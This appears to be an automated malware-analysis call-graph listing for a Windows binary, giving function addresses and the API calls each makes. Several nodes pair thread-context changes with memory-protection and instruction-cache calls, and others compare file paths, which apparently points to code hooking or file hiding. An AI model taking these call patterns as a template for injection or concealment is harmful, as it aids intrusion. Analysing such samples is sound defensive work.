7639->7661 7644 158709dc9c6 SetLastError 7641->7644 7644->7633 7653 158709dd231 _invalid_parameter_noinfo 7648->7653 7649 158709dd282 7652 158709dd1f4 __std_exception_copy 12 API calls 7649->7652 7650 158709dd266 HeapAlloc 7651 158709dc987 7650->7651 7650->7653 7651->7636 7651->7637 7652->7651 7653->7649 7653->7650 7666 158709db470 7653->7666 7656 158709dd2a5 HeapFree 7655->7656 7657 158709dc9a3 7655->7657 7656->7657 7658 158709dd2c0 GetLastError 7656->7658 7657->7632 7659 158709dd2cd __free_lconv_num 7658->7659 7660 158709dd1f4 __std_exception_copy 11 API calls 7659->7660 7660->7657 7675 158709dc630 7661->7675 7669 158709db4c0 7666->7669 7674 158709dc558 EnterCriticalSection 7669->7674 7687 158709dc558 EnterCriticalSection 7675->7687 7690 158709dcf23 7689->7690 7697 158709dcf94 7690->7697 7692 158709dcf4a 7695 158709dcf6d 7692->7695 7707 158709dc3e0 7692->7707 7694 158709dcf82 7694->7612 7695->7694 7696 158709dc3e0 _invalid_parameter_noinfo 17 API calls 7695->7696 7696->7694 7720 158709dccc8 7697->7720 7702 158709dcfcf 7702->7692 7708 158709dc3ef GetLastError 7707->7708 7709 158709dc438 7707->7709 7710 158709dc404 7708->7710 7709->7695 7711 158709dcba0 _invalid_parameter_noinfo 14 API calls 7710->7711 7712 158709dc41e SetLastError 7711->7712 7712->7709 7713 158709dc441 7712->7713 7714 158709dc3e0 _invalid_parameter_noinfo 15 API calls 7713->7714 7715 158709dc467 7714->7715 7760 158709dffe8 7715->7760 7721 158709dcce4 GetLastError 7720->7721 7722 158709dcd1f 7720->7722 7723 158709dccf4 7721->7723 7722->7702 7726 158709dcd34 7722->7726 7733 158709dcba0 7723->7733 7727 158709dcd50 GetLastError SetLastError 7726->7727 7728 158709dcd68 7726->7728 7727->7728 7728->7702 7729 158709dd06c IsProcessorFeaturePresent 7728->7729 7730 158709dd07f 7729->7730 7738 158709dcd80 7730->7738 7734 158709dcbc8 FlsGetValue 7733->7734 7736 158709dcbc4 7733->7736 7734->7736 7735 158709dcbde SetLastError 7735->7722 7736->7735 7737 158709dc940 _invalid_parameter_noinfo 13 API calls 7736->7737 7737->7735 7739 158709dcdba _invalid_parameter_noinfo 7738->7739 7740 158709dcde2 RtlCaptureContext RtlLookupFunctionEntry 7739->7740 7741 158709dce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7740->7741 7742 158709dce2e RtlVirtualUnwind 7740->7742 7745 158709dceb6 _invalid_parameter_noinfo 7741->7745 7742->7741 7746 158709d8070 7745->7746 7747 158709d8079 7746->7747 7748 158709d8084 GetCurrentProcess TerminateProcess 7747->7748 7749 158709d8848 IsProcessorFeaturePresent 7747->7749 7750 158709d8860 7749->7750 7755 158709d891c RtlCaptureContext 7750->7755 7756 158709d8936 RtlLookupFunctionEntry 7755->7756 7757 158709d8873 7756->7757 7758 158709d894c RtlVirtualUnwind 7756->7758 7759 158709d8814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7757->7759 7758->7756 7758->7757 7761 158709dc48f 7760->7761 7762 158709e0001 7760->7762 7764 158709e0054 7761->7764 7762->7761 7768 158709e0a40 7762->7768 7765 158709e006d 7764->7765 7767 158709dc49f 7764->7767 7765->7767 7786 158709de8c4 7765->7786 7767->7695 7777 158709dcab0 7768->7777 7770 158709e0a4f 7776 158709e0a95 7770->7776 7785 158709dc558 EnterCriticalSection 7770->7785 7776->7761 7778 158709dcb10 __std_exception_copy 13 API calls 7777->7778 7780 158709dcab9 7778->7780 7779 158709dcabe 7779->7770 7780->7779 7781 158709dcae8 FlsGetValue 7780->7781 7783 158709dcae4 7780->7783 7781->7783 7782 158709dcafe 7782->7770 7783->7782 7784 158709dc940 _invalid_parameter_noinfo 13 API calls 7783->7784 7784->7782 7787 158709dcab0 _invalid_parameter_noinfo 14 API calls 7786->7787 7788 158709de8cd 7787->7788 8822 158709d27e8 8824 158709d2867 8822->8824 8823 158709d2998 8824->8823 8825 158709d28c9 GetFileType 8824->8825 8826 158709d28d7 StrCpyW 8825->8826 8827 158709d28ed 8825->8827 8828 158709d28fc 8826->8828 8838 158709d1ad4 GetFinalPathNameByHandleW 8827->8838 8832 158709d299d 8828->8832 8834 158709d2906 8828->8834 8830 158709d3f88 StrCmpNIW 8830->8832 8831 158709d3f88 StrCmpNIW 8831->8834 8832->8823 8832->8830 8833 158709d3708 4 API calls 8832->8833 8835 158709d1dd4 2 API calls 8832->8835 8833->8832 8834->8823 8834->8831 8843 158709d3708 StrCmpIW 8834->8843 8847 158709d1dd4 8834->8847 8835->8832 8839 158709d1b3d 8838->8839 8840 158709d1afe StrCmpNIW 8838->8840 8839->8828 8840->8839 8841 158709d1b18 lstrlenW 8840->8841 8841->8839 8842 158709d1b2a StrCpyW 8841->8842 8842->8839 8844 158709d3751 PathCombineW 8843->8844 8845 158709d373a StrCpyW StrCatW 8843->8845 8846 158709d375a 8844->8846 8845->8846 8846->8834 8848 158709d1df4 8847->8848 8849 158709d1deb 8847->8849 8848->8834 8850 158709d1530 2 API calls 8849->8850 8850->8848 8851 158709db7ea 8852 158709dc2f4 14 API calls 8851->8852 8853 158709db7ef 8852->8853 8854 158709db815 GetModuleHandleW 8853->8854 8855 158709db85f 8853->8855 8854->8855 8859 158709db822 8854->8859 8868 158709db6f8 8855->8868 8859->8855 8863 158709db904 GetModuleHandleExW 8859->8863 8864 158709db94a 8863->8864 8865 158709db938 GetProcAddress 8863->8865 8866 158709db962 8864->8866 8867 158709db95b FreeLibrary 8864->8867 8865->8864 8866->8855 8867->8866 8880 158709dc558 EnterCriticalSection 8868->8880 9187 158709d2f64 9189 158709d2fc1 9187->9189 9188 158709d2fdc 9189->9188 9190 158709d38a8 3 API calls 9189->9190 9190->9188 8881 158709df3e4 8882 158709df41d 8881->8882 8884 158709df3ee 8881->8884 8883 158709df403 FreeLibrary 8883->8884 8884->8882 8884->8883 8885 158709e33e4 8886 158709e33f5 CloseHandle 8885->8886 8887 158709e33fb 8885->8887 8886->8887 9191 158709d7f60 9192 158709d7f81 9191->9192 9193 158709d7f7c 9191->9193 9195 158709d8090 9193->9195 9196 158709d8127 9195->9196 9197 158709d80b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9195->9197 9196->9192 9197->9196 7789 158709e06e0 7790 158709e06e9 7789->7790 7794 158709e06f9 7789->7794 7791 158709dd1f4 __std_exception_copy 13 API calls 7790->7791 7792 158709e06ee 7791->7792 7793 158709dd04c _invalid_parameter_noinfo 38 API calls 7792->7793 7793->7794 8888 158709d63e3 8889 158709d63f0 8888->8889 8890 158709d63fc GetThreadContext 8889->8890 8897 158709d655a 8889->8897 8891 158709d6422 8890->8891 8890->8897 8896 158709d6449 8891->8896 8891->8897 8892 158709d6581 VirtualProtect FlushInstructionCache 8892->8897 8893 158709d663e 8894 158709d665e 8893->8894 8906 158709d4b20 8893->8906 8910 158709d5530 GetCurrentProcess 8894->8910 8898 158709d64cd 8896->8898 8901 158709d64a6 SetThreadContext 8896->8901 8897->8892 8897->8893 8900 158709d6663 8902 158709d6677 ResumeThread 8900->8902 8903 158709d66b7 8900->8903 8901->8898 8902->8900 8904 158709d8070 _invalid_parameter_noinfo 8 API calls 8903->8904 8905 158709d66ff 8904->8905 8908 158709d4b3c 8906->8908 8907 158709d4b9f 8907->8894 8908->8907 8909 158709d4b52 VirtualFree 8908->8909 8909->8908 8911 158709d554c 8910->8911 8912 158709d5593 8911->8912 8913 158709d5562 VirtualProtect FlushInstructionCache 8911->8913 8912->8900 8913->8911 9198 158709e3960 9208 158709d8ca0 9198->9208 9200 158709e3988 9202 158709d9324 __CxxCallCatchBlock 9 API calls 9203 158709e3998 9202->9203 9204 158709d9324 __CxxCallCatchBlock 9 API calls 9203->9204 9205 158709e39a1 9204->9205 9206 158709dc2f4 14 API calls 9205->9206 9207 158709e39aa 9206->9207 9210 158709d8cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9208->9210 9209 158709d8dd1 9209->9200 9209->9202 9210->9209 9211 158709d8d94 RtlUnwindEx 9210->9211 9211->9210 8260 158709e485e 8261 158709d9324 __CxxCallCatchBlock 9 API calls 8260->8261 8262 158709e486c 8261->8262 8263 158709e4877 8262->8263 8264 158709d9324 __CxxCallCatchBlock 9 API calls 8262->8264 8264->8263 8265 158709e465f 8266 158709e46e2 8265->8266 8267 158709e4677 8265->8267 8267->8266 8268 158709d9324 __CxxCallCatchBlock 9 API calls 8267->8268 8269 158709e46c4 8268->8269 8270 158709d9324 __CxxCallCatchBlock 9 API calls 8269->8270 8271 158709e46d9 8270->8271 8273 158709dc2f4 8271->8273 8274 158709dcab0 _invalid_parameter_noinfo 14 API calls 8273->8274 8275 158709dc2fd 8274->8275 8914 158709d25dc 8916 158709d265a 8914->8916 8915 158709d2777 8916->8915 8917 158709d26bf GetFileType 8916->8917 8918 158709d26e1 8917->8918 8919 158709d26cd StrCpyW 8917->8919 8920 158709d1ad4 4 API calls 8918->8920 8923 158709d26ee 8919->8923 8920->8923 8921 158709d3f88 StrCmpNIW 8921->8923 8922 158709d3708 4 API calls 8922->8923 8923->8915 8923->8921 8923->8922 8924 158709d1dd4 2 API calls 8923->8924 8924->8923 7795 158709df6dc 7796 158709df6e8 7795->7796 7798 158709df70f 7796->7798 7799 158709e1c0c 7796->7799 7800 158709e1c11 7799->7800 7804 158709e1c4c 7799->7804 7801 158709e1c44 7800->7801 7802 158709e1c32 DeleteCriticalSection 7800->7802 7803 158709dd2a0 __free_lconv_num 13 API calls 7801->7803 7802->7801 7802->7802 7803->7804 7804->7796 8925 158709dc1d8 8926 158709dc1f1 8925->8926 8927 158709dc209 8925->8927 8926->8927 8928 158709dd2a0 __free_lconv_num 13 API calls 8926->8928 8928->8927 8276 158709dd658 8277 158709dd67d 8276->8277 8282 158709dd694 8276->8282 8278 158709dd1f4 __std_exception_copy 13 API calls 8277->8278 8279 158709dd682 8278->8279 8281 158709dd04c _invalid_parameter_noinfo 38 API calls 8279->8281 8280 158709dd724 8408 158709dbb54 8280->8408 8300 158709dd68d 8281->8300 8282->8280 8291 158709dd6da 8282->8291 8302 158709dd7b6 8282->8302 8309 158709dd894 8282->8309 8371 158709dda18 8282->8371 8287 158709dd784 8288 158709dd2a0 __free_lconv_num 13 API calls 8287->8288 8299 158709dd78b 8288->8299 8289 158709dd836 8290 158709dd2a0 __free_lconv_num 13 API calls 8289->8290 8295 158709dd841 8290->8295 8297 158709dd2a0 __free_lconv_num 13 API calls 8291->8297 8304 158709dd6fd 8291->8304 8292 158709dd2a0 __free_lconv_num 13 API calls 8292->8299 8293 158709dd2a0 __free_lconv_num 13 API calls 8293->8300 8294 158709dd85a 8303 158709dd2a0 __free_lconv_num 13 API calls 8294->8303 8295->8294 8301 158709dd2a0 __free_lconv_num 13 API calls 8295->8301 8296 158709dd2a0 __free_lconv_num 13 API calls 8296->8302 8297->8291 8299->8292 8299->8304 8301->8295 8302->8296 8302->8304 8303->8300 8304->8293 8305 158709dd7d7 8305->8289 8306 158709dd87c 8305->8306 8414 158709e0eb8 8305->8414 8307 158709dd06c _invalid_parameter_noinfo 17 API calls 8306->8307 8308 158709dd891 8307->8308 8310 158709dd8c2 8309->8310 8310->8310 8311 158709dd8de 8310->8311 8312 158709dd220 _invalid_parameter_noinfo 13 API calls 8310->8312 8311->8282 8313 158709dd90d 8312->8313 8314 158709dd926 8313->8314 8316 158709e0eb8 38 API calls 8313->8316 8315 158709e0eb8 38 API calls 8314->8315 8318 158709dd9fc 8314->8318 8317 158709dd943 8315->8317 8316->8314 8317->8318 8319 158709dd97f 8317->8319 8321 158709dd962 8317->8321 8322 158709dd98d 8317->8322 8320 158709dd06c _invalid_parameter_noinfo 17 API calls 8318->8320 8324 158709dd2a0 __free_lconv_num 13 API calls 8319->8324 8332 158709dda17 8320->8332 8323 158709dd220 _invalid_parameter_noinfo 13 API calls 8321->8323 8325 158709dd977 8322->8325 8423 158709deee0 8322->8423 8327 158709dd96d 8323->8327 8324->8318 8325->8319 8326 158709dd2a0 __free_lconv_num 13 API calls 8325->8326 8326->8319 8330 158709dd2a0 __free_lconv_num 13 API calls 8327->8330 8329 158709dda7a 8334 158709dda8c 8329->8334 8341 158709ddaa1 8329->8341 8330->8325 8331 158709dd9b5 8335 158709dd9d0 8331->8335 8336 158709dd9ba 8331->8336 8332->8329 8432 158709e13d8 8332->8432 8338 158709dd894 52 API calls 8334->8338 8337 158709dd2a0 __free_lconv_num 13 API calls 8335->8337 8339 158709dd2a0 __free_lconv_num 13 API calls 8336->8339 8337->8319 8340 158709dda9c 8338->8340 8339->8325 8342 158709d8070 _invalid_parameter_noinfo 8 API calls 8340->8342 8343 158709ddd78 14 API calls 8341->8343 8344 158709ddd64 8342->8344 8345 158709ddb0b 8343->8345 8344->8282 8346 158709ddb1a 8345->8346 8441 158709df198 8345->8441 8445 158709dd30c 8346->8445 8350 158709ddba8 8351 158709dd894 52 API calls 8350->8351 8352 158709ddbb8 8351->8352 8352->8340 8354 158709dd2a0 __free_lconv_num 13 API calls 8352->8354 8353 158709ddd78 14 API calls 8359 158709ddbd2 8353->8359 8354->8340 8355 158709df198 9 API calls 8355->8359 8357 158709dd894 52 API calls 8357->8359 8358 158709ddcc8 FindNextFileW 8358->8359 8362 158709ddce0 8358->8362 8359->8353 8359->8355 8359->8357 8359->8358 8360 158709dd2a0 13 API calls __free_lconv_num 8359->8360 8361 158709ddd2a 8359->8361 8467 158709dd4ac 8359->8467 8360->8359 8363 158709ddd38 FindClose 8361->8363 8367 158709dd2a0 __free_lconv_num 13 API calls 8361->8367 8364 158709ddd0c FindClose 8362->8364 8489 158709e0b20 8362->8489 8363->8340 8368 158709ddd48 8363->8368 8364->8340 8366 158709ddd1c 8364->8366 8369 158709dd2a0 __free_lconv_num 13 API calls 8366->8369 8367->8363 8370 158709dd2a0 __free_lconv_num 13 API calls 8368->8370 8369->8340 8370->8340 8372 158709dda7a 8371->8372 8373 158709dda58 8371->8373 8375 158709dda8c 8372->8375 8378 158709ddaa1 8372->8378 8373->8372 8374 158709e13d8 38 API calls 8373->8374 8374->8373 8376 158709dd894 56 API calls 8375->8376 8377 158709dda9c 8376->8377 8379 158709d8070 _invalid_parameter_noinfo 8 API calls 8377->8379 8380 158709ddd78 14 API calls 8378->8380 8381 158709ddd64 8379->8381 8382 158709ddb0b 8380->8382 8381->8282 8383 158709ddb1a 8382->8383 8384 158709df198 9 API calls 8382->8384 8385 158709dd30c 16 API calls 8383->8385 8384->8383 8386 158709ddb7b FindFirstFileExW 8385->8386 8387 158709ddba8 8386->8387 8396 158709ddbd2 8386->8396 8388 158709dd894 56 API calls 8387->8388 8389 158709ddbb8 8388->8389 8389->8377 8391 158709dd2a0 __free_lconv_num 13 API calls 8389->8391 8390 158709ddd78 14 API calls 8390->8396 8391->8377 8392 158709df198 9 API calls 8392->8396 8393 158709dd4ac 16 API calls 8393->8396 8394 158709dd894 56 API calls 8394->8396 8395 158709ddcc8 FindNextFileW 8395->8396 8399 158709ddce0 8395->8399 8396->8390 8396->8392 8396->8393 8396->8394 8396->8395 8397 158709dd2a0 13 API calls __free_lconv_num 8396->8397 8398 158709ddd2a 8396->8398 8397->8396 8400 158709ddd38 FindClose 8398->8400 8404 158709dd2a0 __free_lconv_num 13 API calls 8398->8404 8401 158709ddd0c FindClose 8399->8401 8402 158709e0b20 38 API calls 8399->8402 8400->8377 8405 158709ddd48 8400->8405 8401->8377 8403 158709ddd1c 8401->8403 8402->8401 8406 158709dd2a0 __free_lconv_num 13 API calls 8403->8406 8404->8400 8407 158709dd2a0 __free_lconv_num 13 API calls 8405->8407 8406->8377 8407->8377 8409 158709dbb6c 8408->8409 8413 158709dbba4 8408->8413 8410 158709dd220 _invalid_parameter_noinfo 13 API calls 8409->8410 8409->8413 8411 158709dbb9a 8410->8411 8412 158709dd2a0 __free_lconv_num 13 API calls 8411->8412 8412->8413 8413->8287 8413->8305 8418 158709e0ed5 8414->8418 8415 158709e0eda 8416 158709e0ef0 8415->8416 8417 158709dd1f4 __std_exception_copy 13 API calls 8415->8417 8416->8305 8419 158709e0ee4 8417->8419 8418->8415 8418->8416 8421 158709e0f24 8418->8421 8420 158709dd04c _invalid_parameter_noinfo 38 API calls 8419->8420 8420->8416 8421->8416 8422 158709dd1f4 __std_exception_copy 13 API calls 8421->8422 8422->8419 8424 158709def02 8423->8424 8425 158709def1f 8423->8425 8424->8425 8426 158709def10 8424->8426 8427 158709def29 8425->8427 8497 158709e19f0 8425->8497 8428 158709dd1f4 __std_exception_copy 13 API calls 8426->8428 8504 158709e1a40 8427->8504 8430 158709def15 8428->8430 8430->8331 8433 158709e13e0 8432->8433 8434 158709e13f5 8433->8434 8436 158709e140e 8433->8436 8435 158709dd1f4 __std_exception_copy 13 API calls 8434->8435 8437 158709e13fa 8435->8437 8438 158709e1405 8436->8438 8439 158709ddd78 14 API calls 8436->8439 8440 158709dd04c _invalid_parameter_noinfo 38 API calls 8437->8440 8438->8332 8439->8438 8440->8438 8442 158709df1ca 8441->8442 8443 158709df1a9 8441->8443 8442->8346 8443->8442 8444 158709def88 9 API calls 8443->8444 8444->8442 8446 158709dd336 8445->8446 8447 158709dd35a 8445->8447 8448 158709dd345 FindFirstFileExW 8446->8448 8451 158709dd2a0 __free_lconv_num 13 API calls 8446->8451 8449 158709dd3bf 8447->8449 8450 158709dd35f 8447->8450 8448->8350 8448->8359 8452 158709dec58 MultiByteToWideChar 8449->8452 8450->8448 8454 158709dd374 8450->8454 8455 158709dd2a0 __free_lconv_num 13 API calls 8450->8455 8451->8448 8453 158709dd3db 8452->8453 8457 158709dd3e2 GetLastError 8453->8457 8461 158709dd2a0 __free_lconv_num 13 API calls 8453->8461 8465 158709dd413 8453->8465 8466 158709dd420 8453->8466 8456 158709dc5d0 14 API calls 8454->8456 8455->8454 8456->8448 8516 158709dd184 8457->8516 8459 158709dec58 MultiByteToWideChar 8463 158709dd47a 8459->8463 8461->8465 8462 158709dc5d0 14 API calls 8462->8466 8463->8448 8463->8457 8464 158709dd1f4 __std_exception_copy 13 API calls 8464->8448 8465->8462 8466->8448 8466->8459 8468 158709dd4d6 8467->8468 8469 158709dd4fa 8467->8469 8473 158709dd2a0 __free_lconv_num 13 API calls 8468->8473 8479 158709dd4e5 8468->8479 8470 158709dd500 8469->8470 8471 158709dd55f 8469->8471 8474 158709dd2a0 __free_lconv_num 13 API calls 8470->8474 8478 158709dd515 8470->8478 8470->8479 8472 158709dece8 WideCharToMultiByte 8471->8472 8481 158709dd583 8472->8481 8473->8479 8474->8478 8475 158709dc5d0 14 API calls 8475->8479 8476 158709dd58a GetLastError 8480 158709dd184 13 API calls 8476->8480 8477 158709dd5c7 8477->8479 8483 158709dece8 WideCharToMultiByte 8477->8483 8478->8475 8479->8359 8484 158709dd597 8480->8484 8481->8476 8481->8477 8482 158709dd5bb 8481->8482 8486 158709dd2a0 __free_lconv_num 13 API calls 8481->8486 8487 158709dc5d0 14 API calls 8482->8487 8488 158709dd629 8483->8488 8485 158709dd1f4 __std_exception_copy 13 API calls 8484->8485 8485->8479 8486->8482 8487->8477 8488->8476 8488->8479 8490 158709e0b52 8489->8490 8491 158709dd1f4 __std_exception_copy 13 API calls 8490->8491 8496 158709e0b67 8490->8496 8492 158709e0b5c 8491->8492 8493 158709dd04c _invalid_parameter_noinfo 38 API calls 8492->8493 8493->8496 8494 158709d8070 _invalid_parameter_noinfo 8 API calls 8495 158709e0ea8 8494->8495 8495->8364 8496->8494 8498 158709e1a12 HeapSize 8497->8498 8499 158709e19f9 8497->8499 8500 158709dd1f4 __std_exception_copy 13 API calls 8499->8500 8501 158709e19fe 8500->8501 8502 158709dd04c _invalid_parameter_noinfo 38 API calls 8501->8502 8503 158709e1a09 8502->8503 8503->8427 8505 158709e1a55 8504->8505 8506 158709e1a5f 8504->8506 8507 158709dc5d0 14 API calls 8505->8507 8508 158709e1a64 8506->8508 8514 158709e1a6b _invalid_parameter_noinfo 8506->8514 8513 158709e1a5d 8507->8513 8511 158709dd2a0 __free_lconv_num 13 API calls 8508->8511 8509 158709e1a71 8512 158709dd1f4 __std_exception_copy 13 API calls 8509->8512 8510 158709e1a9e HeapReAlloc 8510->8513 8510->8514 8511->8513 8512->8513 8513->8430 8514->8509 8514->8510 8515 158709db470 _invalid_parameter_noinfo 2 API calls 8514->8515 8515->8514 8521 158709dd1d0 8516->8521 8518 158709dd191 __free_lconv_num 8519 158709dd1f4 __std_exception_copy 13 API calls 8518->8519 8520 158709dd1a1 8519->8520 8520->8464 8522 158709dcb10 __std_exception_copy 13 API calls 8521->8522 8523 158709dd1d9 8522->8523 8523->8518 7814 158709dc510 7815 158709dc518 7814->7815 7816 158709dc545 7815->7816 7818 158709dc574 7815->7818 7819 158709dc59f 7818->7819 7820 158709dc5a3 7819->7820 7821 158709dc582 DeleteCriticalSection 7819->7821 7820->7816 7821->7819 8929 158709e4611 __scrt_dllmain_exception_filter 8524 158709d5c8d 8526 158709d5c94 8524->8526 8525 158709d5cfb 8526->8525 8527 158709d5d77 VirtualProtect 8526->8527 8528 158709d5db1 8527->8528 8529 158709d5da3 GetLastError 8527->8529 8529->8528 7822 158709d8f0c 7829 158709d946c 7822->7829 7828 158709d8f19 7830 158709d9474 7829->7830 7832 158709d94a5 7830->7832 7834 158709d8f15 7830->7834 7846 158709d9d28 7830->7846 7833 158709d94b4 __vcrt_uninitialize_locks DeleteCriticalSection 7832->7833 7833->7834 7834->7828 7835 158709d9400 7834->7835 7851 158709d9bfc 7835->7851 7847 158709d9aac __vcrt_FlsAlloc 5 API calls 7846->7847 7848 158709d9d5e 7847->7848 7849 158709d9d73 InitializeCriticalSectionAndSpinCount 7848->7849 7850 158709d9d68 7848->7850 7849->7850 7850->7830 7852 158709d9aac __vcrt_FlsAlloc 5 API calls 7851->7852 7853 158709d9c21 TlsAlloc 7852->7853 8930 158709d820c 8937 158709d8f34 8930->8937 8933 158709d8219 8938 158709d9340 __CxxCallCatchBlock 9 API calls 8937->8938 8939 158709d8215 8938->8939 8939->8933 8940 158709dc288 8939->8940 8941 158709dcb10 __std_exception_copy 13 API calls 8940->8941 8942 158709d8222 8941->8942 8942->8933 8943 158709d8f48 8942->8943 8946 158709d92dc 8943->8946 8945 158709d8f51 8945->8933 8947 158709d92ed 8946->8947 8951 158709d9302 8946->8951 8948 158709d9c8c __CxxCallCatchBlock 6 API calls 8947->8948 8949 158709d92f2 8948->8949 8952 158709d9cd4 8949->8952 8951->8945 8953 158709d9aac __vcrt_FlsAlloc 5 API calls 8952->8953 8954 158709d9d02 8953->8954 8955 158709d9d14 TlsSetValue 8954->8955 8956 158709d9d0c 8954->8956 8955->8956 8956->8951 7855 158709d2300 7856 158709d2331 7855->7856 7857 158709d2412 7856->7857 7858 158709d2447 7856->7858 7864 158709d2355 7856->7864 7859 158709d244c 7858->7859 7860 158709d24bb 7858->7860 7872 158709d35c8 GetProcessHeap HeapAlloc 7859->7872 7860->7857 7863 158709d35c8 11 API calls 7860->7863 7862 158709d238d StrCmpNIW 7862->7864 7863->7857 7864->7857 7864->7862 7866 158709d1d30 7864->7866 7867 158709d1db4 7866->7867 7868 158709d1d57 GetProcessHeap HeapAlloc 7866->7868 7867->7864 7868->7867 7869 158709d1d92 7868->7869 7878 158709d1cfc 7869->7878 7876 158709d361b 7872->7876 7873 158709d36d9 GetProcessHeap HeapFree 7873->7857 7874 158709d36d4 7874->7873 7875 158709d3666 StrCmpNIW 7875->7876 7876->7873 7876->7874 7876->7875 7877 158709d1d30 6 API calls 7876->7877 7877->7876 7879 158709d1d1c GetProcessHeap HeapFree 7878->7879 7880 158709d1d13 7878->7880 7879->7867 7881 158709d1530 2 API calls 7880->7881 7881->7879 7882 158709db500 7887 158709dc558 EnterCriticalSection 7882->7887 8530 158709d2c80 TlsGetValue TlsGetValue TlsGetValue 8531 158709d2cd9 8530->8531 8534 158709d2d51 8530->8534 8531->8534 8536 158709d2ce1 8531->8536 8532 158709d2d4c 8533 158709d2e06 TlsSetValue TlsSetValue TlsSetValue 8533->8532 8534->8532 8534->8533 8537 158709d3f88 StrCmpNIW 8534->8537 8536->8532 8536->8533 8538 158709d3f88 8536->8538 8537->8534 8539 158709d3f95 StrCmpNIW 8538->8539 8540 158709d3faa 8538->8540 8539->8540 8540->8536 9212 158709dc180 9215 158709dbf38 9212->9215 9222 158709dbf00 9215->9222 9220 158709dbebc 13 API calls 9221 158709dbf6b 9220->9221 9223 158709dbf15 9222->9223 9224 158709dbf10 9222->9224 9226 158709dbf1c 9223->9226 9225 158709dbebc 13 API calls 9224->9225 9225->9223 9227 158709dbf31 9226->9227 9228 158709dbf2c 9226->9228 9227->9220 9229 158709dbebc 13 API calls 9228->9229 9229->9227 8957 158709dcbfc 8962 158709df3a0 8957->8962 8959 158709dcc05 8960 158709dcb10 __std_exception_copy 13 API calls 8959->8960 8961 158709dcc22 __vcrt_uninitialize_ptd 8959->8961 8960->8961 8963 158709df3b5 8962->8963 8964 158709df3b1 8962->8964 8963->8964 8965 158709def88 9 API calls 8963->8965 8964->8959 8965->8964 8541 158709e387c 8542 158709e38b4 __GSHandlerCheckCommon 8541->8542 8543 158709e38e0 8542->8543 8545 158709d9a24 8542->8545 8546 158709d9324 __CxxCallCatchBlock 9 API calls 8545->8546 8547 158709d9a4e 8546->8547 8548 158709d9324 __CxxCallCatchBlock 9 API calls 8547->8548 8549 158709d9a5b 8548->8549 8550 158709d9324 __CxxCallCatchBlock 9 API calls 8549->8550 8551 158709d9a64 8550->8551 8551->8543 8966 158709d5ff9 8967 158709d6000 VirtualProtect 8966->8967 8968 158709d6029 GetLastError 8967->8968 8969 158709d5f10 8967->8969 8968->8969 8970 158709d41f9 8971 158709d4146 8970->8971 8972 158709d4196 VirtualQuery 8971->8972 8973 158709d41ca VirtualAlloc 8971->8973 8974 158709d41b0 8971->8974 8972->8971 8972->8974 8973->8974 8975 158709d41fb GetLastError 8973->8975 8975->8971 8975->8974 7888 158709dbd34 7889 158709dbd4d 7888->7889 7890 158709dbd49 7888->7890 7903 158709de864 7889->7903 7895 158709dbd5f 7897 158709dd2a0 __free_lconv_num 13 API calls 7895->7897 7896 158709dbd6b 7929 158709dbda8 7896->7929 7897->7890 7900 158709dd2a0 __free_lconv_num 13 API calls 7901 158709dbd92 7900->7901 7902 158709dd2a0 __free_lconv_num 13 API calls 7901->7902 7902->7890 7904 158709de871 7903->7904 7905 158709dbd52 7903->7905 7948 158709dcacc 7904->7948 7909 158709dedc8 GetEnvironmentStringsW 7905->7909 7907 158709de8a0 7953 158709de53c 7907->7953 7910 158709dbd57 7909->7910 7911 158709dedf8 7909->7911 7910->7895 7910->7896 7912 158709dece8 WideCharToMultiByte 7911->7912 7913 158709dee49 7912->7913 7914 158709dee53 FreeEnvironmentStringsW 7913->7914 7915 158709dc5d0 14 API calls 7913->7915 7914->7910 7916 158709dee63 7915->7916 7917 158709dee74 7916->7917 7918 158709dee6b 7916->7918 7919 158709dece8 WideCharToMultiByte 7917->7919 7920 158709dd2a0 __free_lconv_num 13 API calls 7918->7920 7921 158709dee97 7919->7921 7922 158709dee72 7920->7922 7923 158709deea5 7921->7923 7924 158709dee9b 7921->7924 7922->7914 7926 158709dd2a0 __free_lconv_num 13 API calls 7923->7926 7925 158709dd2a0 __free_lconv_num 13 API calls 7924->7925 7927 158709deea3 FreeEnvironmentStringsW 7925->7927 7926->7927 7927->7910 7930 158709dbdcd 7929->7930 7931 158709dd220 _invalid_parameter_noinfo 13 API calls 7930->7931 7937 158709dbe03 7931->7937 7932 158709dd2a0 __free_lconv_num 13 API calls 7934 158709dbd73 7932->7934 7933 158709dbe6d 7935 158709dd2a0 __free_lconv_num 13 API calls 7933->7935 7934->7900 7935->7934 7936 158709dd220 _invalid_parameter_noinfo 13 API calls 7936->7937 7937->7933 7937->7936 7938 158709dbe92 7937->7938 7940 158709dc328 __std_exception_copy 38 API calls 7937->7940 7943 158709dbea6 7937->7943 7944 158709dbe0b 7937->7944 7946 158709dd2a0 __free_lconv_num 13 API calls 7937->7946 8144 158709dbebc 7938->8144 7940->7937 7942 158709dd2a0 __free_lconv_num 13 API calls 7942->7944 7945 158709dd06c _invalid_parameter_noinfo 17 API calls 7943->7945 7944->7932 7947 158709dbeb9 7945->7947 7946->7937 7949 158709dcae8 FlsGetValue 7948->7949 7950 158709dcae4 7948->7950 7949->7950 7951 158709dcafe 7950->7951 7952 158709dc940 _invalid_parameter_noinfo 13 API calls 7950->7952 7951->7907 7952->7951 7976 158709de7ac 7953->7976 7960 158709de5a7 7961 158709dd2a0 __free_lconv_num 13 API calls 7960->7961 7962 158709de58e 7961->7962 7962->7905 7963 158709de5b6 8002 158709de8e0 7963->8002 7966 158709de6b2 7967 158709dd1f4 __std_exception_copy 13 API calls 7966->7967 7968 158709de6b7 7967->7968 7970 158709dd2a0 __free_lconv_num 13 API calls 7968->7970 7969 158709de70d 7972 158709de774 7969->7972 8013 158709de05c 7969->8013 7970->7962 7971 158709de6cc 7971->7969 7974 158709dd2a0 __free_lconv_num 13 API calls 7971->7974 7973 158709dd2a0 __free_lconv_num 13 API calls 7972->7973 7973->7962 7974->7969 7977 158709de7cf 7976->7977 7982 158709de7d9 7977->7982 8028 158709dc558 EnterCriticalSection 7977->8028 7983 158709de571 7982->7983 7985 158709dcacc 14 API calls 7982->7985 7988 158709de22c 7983->7988 7986 158709de8a0 7985->7986 7987 158709de53c 56 API calls 7986->7987 7987->7983 8029 158709ddd78 7988->8029 7991 158709de25e 7993 158709de273 7991->7993 7994 158709de263 GetACP 7991->7994 7992 158709de24c 